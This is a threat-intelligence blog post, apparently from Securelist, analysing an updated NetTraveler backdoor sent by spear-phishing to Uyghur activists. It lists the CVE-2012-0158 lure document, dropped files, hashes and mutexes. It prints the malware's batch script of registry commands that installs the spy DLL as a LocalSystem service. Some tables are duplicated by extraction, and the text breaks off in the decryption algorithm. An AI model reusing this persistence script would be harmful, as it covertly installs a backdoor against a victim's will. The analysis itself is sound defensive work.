[We have written about NetTraveler before HERE and HERE.](http://securelist.com/blog/incidents/57455/nettraveler-is-back-the-red-star-apt-returns-with-new-tricks/) Earlier this year, we observed an uptick in the number of attacks against Uyghur and Tibetan supporters using an updated version of the NetTraveler backdoor. Here's an example of a targeted spear-phishing e-mail directed at Uyghur activists in March 2014. The e-mail has two attachments, a non-malicious JPG file and a 373 KB Microsoft Word .DOC file. "Sabiq sot xadimi gulnar abletning qeyin-Qistaqta olgenliki **File name** ashkarilanmaqta.doc" **MD5** b2385963d3afece16bd7478b4cf290ce **Size** 381,667 bytes The .DOC file, which in reality is a "Single File Web Page" container, also known as "Web archive file", appears to have been created on a system using Microsoft Office - Simplified Chinese. It contains an exploit for the CVE-2012-0158 vulnerability, detected by Kaspersky Lab products as |File name|"Sabiq sot xadimi gulnar abletning qeyin-Qistaqta olgenliki ashkarilanmaqta.doc"| |---|---| |MD5|b2385963d3afece16bd7478b4cf290ce| |Size|381,667 bytes| ----- If run on a vulnerable version of Microsoft Office, it drops the main module as "net.exe" (detected by Kaspersky Lab products as Trojan-Dropper.Win32.Agent.lifr), which in turn installs a number of other files. The main C&C module is dumped into "%SystemRoot%\system32\Windowsupdataney.dll", (detected by Kaspersky as Trojan **Spy.Win32.TravNet.qfr).** **Name** WINDOWSUPDATANEY.DLL **MD5** c13c79ad874215cfec8d318468e3d116 **Size** 37,888 bytes It is registered as a service (named "Windowsupdata") through a Windows Batch file named "DOT.BAT" (detected by Kaspersky Lab products as Trojan.BAT.Tiny.b): |Name|WINDOWSUPDATANEY.DLL| |---|---| |MD5|c13c79ad874215cfec8d318468e3d116| |Size|37,888 bytes| @echo off @reg add |Col1|@echo off @reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v Windowsupdata /t REG_MULTI_SZ /d Windowsupdata /f @reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v ImagePath /t REG_EXPAND_SZ /d %SystemRoot%\System32\svchost.exe -k Windowsupdata /f @reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v DisplayName /t REG_SZ /d Windowsupdata /f @reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v ObjectName /t REG_SZ /d LocalSystem /f @reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v ErrorControl /t REG_DWORD /d 1 /f @reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v Start /t REG_DWORD /d 2 /f @reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\system32\Windowsupdataney.dll /f| |---|---| To make sure the malware isn't running multiple times, it uses the mutex "SD_2013 Is Running!" to mark its presence in the system. Other known mutexes used by older and current variants include: Boat-12 Is Running! DocHunter2012 Is Running! Hunter-2012 Is Running! NT-2012 Is Running! ----- NetTravler2012 Is Running! SH-2011 Is Running! ShengHai Is Running! SD2013 is Running! The malware configuration file is written to the "SYSTEM" folder (as opposed to SYSTEM32) and has a slightly new format compared to "older" NetTraveler samples: For the record, here's what an older NetTraveler config file looks like: Obviously, the developers behind NetTraveler have taken steps to try to hide the malware's configuration. Luckily, the encryption is relatively simple to break. The algorithm is as follows: **for (i=0;i